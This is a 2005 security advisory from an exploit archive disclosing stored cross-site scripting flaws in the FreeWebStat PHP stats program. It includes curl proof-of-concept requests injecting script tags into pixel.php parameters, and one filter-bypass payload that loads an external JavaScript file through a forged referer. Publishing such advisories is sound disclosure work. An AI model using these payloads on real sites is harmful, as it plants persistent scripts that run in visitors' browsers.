FreeWebStat Multiple Cross Site Scripting

FreeWebStat Multiple Cross Site Scripting: Posted Dec 1, 2005; Authored by Francesco Ongaro | Site ush.it; FreeWebStat version 1.0 rev37 is vulnerable to multiple cross site scripting flaws.; tags | advisory, xss; SHA-256 | 0020303ba5ebcc0da8d674752ec0c2c826555fce3288cdd245981ad3915983ad; Download | Favorite | View

FreeWebStat Multiple Cross Site Scripting

FreeWebStat Multiple XSS Vulnerabilities

 Name              Multiple XSS Vulnerabilities in FreeWebStat
 Systems Affected  FreeWebStat (verified on 1.0 rev37)
 Severity          Medium Risk
 Vendor            www.freewebstat.com
 Advisory          http://www_ush_it/2005/11/25/free-web-stat/
 Author            Francesco "aScii" Ongaro (ascii at katamail . com)
 Date              20051125 

I. BACKGROUND

FreeWebStat is a PHP stats program, more information is
available at the vendor site.

II. DESCRIPTION

FreeWebStat 1.0 rev37 (the last version at the write time)
is vulnerable to multiple XSS. The impact is a little bugger
since datas will be stored to file and the result of a single
query will persist for some time on the backend. A well-timed
loop of requests will assure the XSS to be permanent.

We issued an advisory for an other application of the same
author called "Php Web Statistik Multiple Vulnerabilities"
who said "new version with all fixed bugs can be found
under www.freewebstat.com". Well, we downloaded this version
and seen the same type of vulnerabilities..

The old advisory:
http://www_ush_it/2005/11/19/php-web-statistik/

III. ANALYSIS

This vulnerability can be exploited by a GET query.

1) logdb.html XSS

logdb.html is vulnerable to JS injection using
anti-escape methods (eg: single quotes will be stripped
but there are a lot of working workrounds for this)

1.1) Curl the pixel.php

curl "http://local.asciistation.zapto.org/fws/pixel.php
?domain=<script>alert(1)</script>
&site=<script>alert(2)</script>
&jsref=<script>alert(3)</script>
&jsres=<script>alert(4)</script>
&jscolor=<script>alert(5)</script>"
-A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"
-e "http://www_ush_it"

$site, $jsref, &jsres and $jscolor are vulnerable.

Loading an url in $jsref will give you a full link (if the logdb.html
page have any pr you can drain some of it.

1.2) Call stats.php

This will generate the new logdb.html file.

1.3) Visit logdb.html

You will see some alerts. : )

The order with the example query is 2 3 2 3 4 5.

1.4) Some test curls

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
domain=ush.it&site=<script>alert(123)&jsref=1024x768
&jsres=1337&jscolor=red" -e "http://www.google.it/search?q=
lello+splendor++&hl=it&lr=&start=10&sa=N" -A "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=1337&jscolor=red"
-e "http://www.google.it/search?q=lello+splendor++&hl=it&lr=&start=
10&sa=N" -A "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=13
37&jscolor=red" -e "http://www.suma.it/" -A "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
domain=<script>alert(1)</script>&site=
<script>alert(2)&jsref=</script><script>alert(3)</script>
&jsres=<script>alert(4)</script>&jscolor=
<script>alert(5)</script>"
-A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"
-e "http://www_ush_it"

2) stat.php search key XSS

2) Detecting the search key XSS

- if ( !in_array ( $logfile_entries [ 2 ] , $ip_archive ) )
+ if (TRUE)

# save the referer except the own domain name.
if the browser value is empty, do not save
+ echo "DEBUG<h1>".$logfile_entries [ 7 ]."</h1>";
if ( ( strpos ( $logfile_entries [ 7 ] , $exception_domain )
=== FALSE ) && ( trim ( $logfile_entries [ 7 ] ) != "" ) )

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&
site=aa&jsref=sukasuka&jsres=1337&jscolor=red"

Will display as many "DEBUG sukasuka" under the header and over the
"summary" as the number of new queries.

# save the referer except the own domain name.
if the browser value is empty, do not save
if ( ( strpos ( $logfile_entries [ 7 ] , $exception_domain )
=== FALSE ) && ( trim ( $logfile_entries [ 7 ] ) != "" ) )

$logfile_entries[7] is the $jsref variable.

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
site=&jsres=&jscolor=&jsref=ssss&domain="

search words ( 1 ) lello splendor 100 % 1
search engines ( 1 ) Google 100 % 1

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
site=&jsres=&jscolor=&jsref=http://www.google.it/search?
q=lello+splendor++&hl=it"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
site=&jsres=&jscolor=&jsref=http://www.google.it/search?
q=<script>alert(123456789)</script>++&hl=it"

Now the injection is executed in 2 points, the referer table and the keyword
table. 

2.2) Exploiting the search key XSS

stat.php give us some tricks, and we are evil. The string will be
lowered and any + or - char will became a (real, not a %20) space.

$terms = str_replace( '\"', "", $terms );   # delete \"
$terms = strtolower( $terms );              # string to lower    

$terms = str_replace( "+" , " ", $terms );  # replace + with space
$terms = str_replace( "-" , " ", $terms );  # replace - with space

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?site=
&jsres=&jscolor=&jsref=http://www.google.it/search?
q=ppoopp<script language="javascript"-src=
"http://local.asciistation.zapto.org/fws/inject.js"></script>&hl=it"

IV. DETECTION

FreeWebStat 1.0 rev37 is vulnerable.
Older version not verified.

V. WORKAROUND

Input validation will fix the vulnerability.

VI. VENDOR RESPONSE

Vendor will fix and release a new version.

VII. CVE INFORMATION

No CVE at this time.

VIII. DISCLOSURE TIMELINE

20051125 Bug discovered
20051125 Developer notification
20051125 Advisory released
20051128 Vendor response

IX. CREDIT

ascii is credited with the discovery of this vulnerability.

X. LEGAL NOTICES

Copyright (c) 2005 Francesco "aScii" Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

Top Authors In Last 30 Days

Red Hat 247 files
Jay Turla 150 files
indoushka 139 files
Ubuntu 61 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (429)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,117)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (880)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,066)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,731)
Slackware (941)
Solaris (1,614)
SUSE (1,444)
Ubuntu (9,807)
UNIX (9,449)
UnixWare (187)
Windows (6,762)
Other

FreeWebStat Multiple Cross Site Scripting

FreeWebStat Multiple Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

FreeWebStat Multiple Cross Site Scripting

Share This

FreeWebStat Multiple Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems